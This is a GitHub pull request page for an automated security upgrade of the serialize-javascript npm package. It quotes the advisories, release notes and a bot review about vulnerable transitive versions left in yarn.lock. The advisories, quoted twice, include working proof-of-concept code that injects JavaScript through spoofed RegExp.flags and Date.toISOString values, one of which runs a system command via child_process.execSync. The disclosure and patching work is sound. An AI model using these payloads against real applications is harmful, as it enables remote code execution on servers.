Skip to content

Update dependency serialize-javascript to v7 [SECURITY]#3342

Merged
rhysyngsun merged 1 commit intomainfrom
renovate/npm-serialize-javascript-vulnerability
Apr 16, 2026
Merged

Update dependency serialize-javascript to v7 [SECURITY]#3342
rhysyngsun merged 1 commit intomainfrom
renovate/npm-serialize-javascript-vulnerability

Conversation

@renovate
Copy link
Copy Markdown
Contributor

@renovate renovate bot commented Mar 2, 2026
edited
Loading

This PR contains the following updates:

Package Change Age Confidence
serialize-javascript 6.0.27.0.5 age confidence

GitHub Vulnerability Alerts

CVE-2024-11831

A flaw was found in npm-serialize-javascript. The vulnerability occurs because the serialize-javascript module does not properly sanitize certain inputs, such as regex or other JavaScript object types, allowing an attacker to inject malicious code. This code could be executed when deserialized by a web browser, causing Cross-site scripting (XSS) attacks. This issue is critical in environments where serialized data is sent to web clients, potentially compromising the security of the website or web application using this package.

Severity
  • CVSS Score: 5.4 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

GHSA-5c6j-r48x-rmvq

Impact

The serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.

While RegExp.source is sanitized, RegExp.flags is interpolated directly into the generated output without escaping. A similar issue exists in Date.prototype.toISOString().

If an attacker can control the input object passed to serialize(), they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via eval, new Function, or <script> tags), the injected code executes.

const serialize = require('serialize-javascript');
// Create an object that passes instanceof RegExp with a spoofed .flags
const fakeRegex = Object.create(RegExp.prototype);
Object.defineProperty(fakeRegex, 'source', { get: () => 'x' });
Object.defineProperty(fakeRegex, 'flags', {
  get: () => '"+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"'
});
fakeRegex.toJSON = function() { return '@&#8203;placeholder'; };
const output = serialize({ re: fakeRegex });
// Output: {"re":new RegExp("x", ""+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"")}
let obj;
eval('obj = ' + output);
console.log(global.PWNED); // "CODE_INJECTION_VIA_FLAGS" — injected code executed!

#h2. PoC 2: Code Injection via Date.toISOString()
const serialize = require('serialize-javascript');
const fakeDate = Object.create(Date.prototype);
fakeDate.toISOString = function() { return '"+(global.DATE_PWNED="DATE_INJECTION")+"'; };
fakeDate.toJSON = function() { return '2024-01-01'; };
const output = serialize({ d: fakeDate });
// Output: {"d":new Date(""+(global.DATE_PWNED="DATE_INJECTION")+"")}
eval('obj = ' + output);
console.log(global.DATE_PWNED); // "DATE_INJECTION" — injected code executed!

#h2. PoC 3: Remote Code Execution
const serialize = require('serialize-javascript');
const rceRegex = Object.create(RegExp.prototype);
Object.defineProperty(rceRegex, 'source', { get: () => 'x' });
Object.defineProperty(rceRegex, 'flags', {
  get: () => '"+require("child_process").execSync("id").toString()+"'
});
rceRegex.toJSON = function() { return '@&#8203;rce'; };
const output = serialize({ re: rceRegex });
// Output: {"re":new RegExp("x", ""+require("child_process").execSync("id").toString()+"")}
// When eval'd on a Node.js server, executes the "id" system command

Patches

The fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3

Severity
  • CVSS Score: 8.1 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2026-34043

Impact

What kind of vulnerability is it?

It is a Denial of Service (DoS) vulnerability caused by CPU exhaustion. When serializing a specially crafted "array-like" object (an object that inherits from Array.prototype but has a very large length property), the process enters an intensive loop that consumes 100% CPU and hangs indefinitely.

Who is impacted?

Applications that use serialize-javascript to serialize untrusted or user-controlled objects are at risk. While direct exploitation is difficult, it becomes a high-priority threat if the application is also vulnerable to Prototype Pollution or handles untrusted data via YAML Deserialization, as these could be used to inject the malicious object.

Patches

Has the problem been patched?

Yes, the issue has been patched by replacing instanceof Array checks with Array.isArray() and using Object.keys() for sparse array detection.

What versions should users upgrade to?

Users should upgrade to v7.0.5 or later.

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

There is no direct code-level workaround within the library itself. However, users can mitigate the risk by:

  • Validating and sanitizing all input before passing it to the serialize() function.
  • Ensuring the environment is protected against Prototype Pollution.
  • Upgrading to v7.0.5 as soon as possible.

Acknowledgements

Serialize JavaScript thanks Tomer Aberbach (@​TomerAberbach) for discovering and privately disclosing this issue.

Severity
  • CVSS Score: 5.9 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()

GHSA-5c6j-r48x-rmvq

More information

Details

Impact

The serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.

While RegExp.source is sanitized, RegExp.flags is interpolated directly into the generated output without escaping. A similar issue exists in Date.prototype.toISOString().

If an attacker can control the input object passed to serialize(), they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via eval, new Function, or <script> tags), the injected code executes.

const serialize = require('serialize-javascript');
// Create an object that passes instanceof RegExp with a spoofed .flags
const fakeRegex = Object.create(RegExp.prototype);
Object.defineProperty(fakeRegex, 'source', { get: () => 'x' });
Object.defineProperty(fakeRegex, 'flags', {
  get: () => '"+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"'
});
fakeRegex.toJSON = function() { return '@&#8203;placeholder'; };
const output = serialize({ re: fakeRegex });
// Output: {"re":new RegExp("x", ""+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"")}
let obj;
eval('obj = ' + output);
console.log(global.PWNED); // "CODE_INJECTION_VIA_FLAGS" — injected code executed!

#h2. PoC 2: Code Injection via Date.toISOString()
const serialize = require('serialize-javascript');
const fakeDate = Object.create(Date.prototype);
fakeDate.toISOString = function() { return '"+(global.DATE_PWNED="DATE_INJECTION")+"'; };
fakeDate.toJSON = function() { return '2024-01-01'; };
const output = serialize({ d: fakeDate });
// Output: {"d":new Date(""+(global.DATE_PWNED="DATE_INJECTION")+"")}
eval('obj = ' + output);
console.log(global.DATE_PWNED); // "DATE_INJECTION" — injected code executed!

#h2. PoC 3: Remote Code Execution
const serialize = require('serialize-javascript');
const rceRegex = Object.create(RegExp.prototype);
Object.defineProperty(rceRegex, 'source', { get: () => 'x' });
Object.defineProperty(rceRegex, 'flags', {
  get: () => '"+require("child_process").execSync("id").toString()+"'
});
rceRegex.toJSON = function() { return '@&#8203;rce'; };
const output = serialize({ re: rceRegex });
// Output: {"re":new RegExp("x", ""+require("child_process").execSync("id").toString()+"")}
// When eval'd on a Node.js server, executes the "id" system command
Patches

The fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3

Severity

  • CVSS Score: 8.1 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Serialize JavaScript has CPU Exhaustion Denial of Service via crafted array-like objects

CVE-2026-34043 / GHSA-qj8w-gfj5-8c6v

More information

Details

Impact

What kind of vulnerability is it?

It is a Denial of Service (DoS) vulnerability caused by CPU exhaustion. When serializing a specially crafted "array-like" object (an object that inherits from Array.prototype but has a very large length property), the process enters an intensive loop that consumes 100% CPU and hangs indefinitely.

Who is impacted?

Applications that use serialize-javascript to serialize untrusted or user-controlled objects are at risk. While direct exploitation is difficult, it becomes a high-priority threat if the application is also vulnerable to Prototype Pollution or handles untrusted data via YAML Deserialization, as these could be used to inject the malicious object.

Patches

Has the problem been patched?

Yes, the issue has been patched by replacing instanceof Array checks with Array.isArray() and using Object.keys() for sparse array detection.

What versions should users upgrade to?

Users should upgrade to v7.0.5 or later.

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

There is no direct code-level workaround within the library itself. However, users can mitigate the risk by:

  • Validating and sanitizing all input before passing it to the serialize() function.
  • Ensuring the environment is protected against Prototype Pollution.
  • Upgrading to v7.0.5 as soon as possible.
Acknowledgements

Serialize JavaScript thanks Tomer Aberbach (@​TomerAberbach) for discovering and privately disclosing this issue.

Severity

  • CVSS Score: 5.9 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Release Notes

yahoo/serialize-javascript (serialize-javascript)

v7.0.5

Compare Source

Fixes
  • Improve robustness and validation for array-like object serialization.
  • Fix an issue where certain object structures could lead to excessive CPU usage.

For more details, please see GHSA-qj8w-gfj5-8c6v.

v7.0.4

Compare Source

What's Changed

Full Changelog: yahoo/serialize-javascript@v7.0.3...v7.0.4

v7.0.3

Compare Source

v7.0.2

Compare Source

What's Changed

Full Changelog: yahoo/serialize-javascript@v7.0.1...v7.0.2

v7.0.1

Compare Source

What's Changed

New Contributors

Full Changelog: yahoo/serialize-javascript@v7.0.0...v7.0.1

v7.0.0

Compare Source

Breaking Changes

  • requires Node.js v20+

What's Changed

New Contributors

Full Changelog: yahoo/serialize-javascript@v6.0.2...v7.0.0

Configuration

📅 Schedule: (in timezone US/Eastern)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@github-actions
Copy link
Copy Markdown

github-actions bot commented Mar 2, 2026
edited
Loading

OpenAPI Changes

Show/hide ## Changes for v0.yaml: 
## Changes for v0.yaml:
No changes detected

## Changes for v1.yaml:
No changes detected

## Changes for v2.yaml:
No changes detected

Unexpected changes? Ensure your branch is up-to-date with main (consider rebasing).

@renovate renovate bot force-pushed the renovate/npm-serialize-javascript-vulnerability branch 12 times, most recently from ba5ead1 to 3d6f278 Compare March 5, 2026 19:36
sentry[bot]
sentry bot reviewed Mar 5, 2026
View reviewed changes
Comment thread yarn.lock
Comment on lines +21032 to +21039
"serialize-javascript@npm:^6.0.0, serialize-javascript@npm:^6.0.2":
version: 6.0.2
resolution: "serialize-javascript@npm:6.0.2"
dependencies:
randombytes: ^2.1.0
checksum: c4839c6206c1d143c0f80763997a361310305751171dd95e4b57efee69b8f6edd8960a0b7fbfc45042aadff98b206d55428aee0dc276efe54f100899c7fa8ab7
languageName: node
linkType: hard
Copy link
Copy Markdown

@sentry sentry bot Mar 5, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Bug: The serialize-javascript dependency upgrade is incomplete. Vulnerable versions remain in the yarn.lock file due to transitive dependencies, leaving a potential security risk.
Severity: HIGH

Suggested Fix

Add a resolutions field to the root package.json file to force all transitive dependencies of serialize-javascript to resolve to the new, secure version (e.g., 7.0.3). After updating package.json, run yarn install to regenerate the yarn.lock file and ensure all instances are upgraded.

Prompt for AI Agent 
Review the code at the location below. A potential bug has been identified by an AI
agent.
Verify if this is a real issue. If it is, propose a fix; if not, explain why it's not
valid.

Location: yarn.lock#L21032-L21039

Potential issue: The pull request attempts to upgrade `serialize-javascript` to fix a
security vulnerability. However, the fix is incomplete. While the direct dependency in
`package.json` is updated, the `yarn.lock` file shows that transitive dependencies still
pull in vulnerable versions of `serialize-javascript` (e.g., `6.0.2`, `6.0.0`, `4.0.0`).
Without a `resolutions` entry in `package.json` to force all instances to the patched
version, the application remains susceptible to the original cross-site scripting (XSS)
vulnerability if any of these transitive dependencies are used in a way that serializes
user-controlled data for client-side evaluation.

Did we get this right? 👍 / 👎 to inform future reviews.

@renovate renovate bot force-pushed the renovate/npm-serialize-javascript-vulnerability branch 9 times, most recently from 9529b13 to 39803e3 Compare March 9, 2026 22:03
@renovate renovate bot changed the title fix(deps): update dependency serialize-javascript to v7 [security] Update dependency serialize-javascript to v7 [SECURITY] Mar 9, 2026
@renovate renovate bot force-pushed the renovate/npm-serialize-javascript-vulnerability branch 6 times, most recently from 0fe9b03 to 6a64473 Compare March 11, 2026 19:26
@renovate renovate bot force-pushed the renovate/npm-serialize-javascript-vulnerability branch 19 times, most recently from ca90577 to e0b4c12 Compare March 24, 2026 13:01
@renovate renovate bot changed the title Update dependency serialize-javascript to v7 [SECURITY] fix(deps): update dependency serialize-javascript to v7 [security] Mar 24, 2026
@renovate renovate bot force-pushed the renovate/npm-serialize-javascript-vulnerability branch 8 times, most recently from 3dc2ff1 to 1926bfe Compare March 26, 2026 18:42
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@sentry sentry[bot] sentry[bot] left review comments

@rhysyngsun rhysyngsun rhysyngsun approved these changes

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@rhysyngsun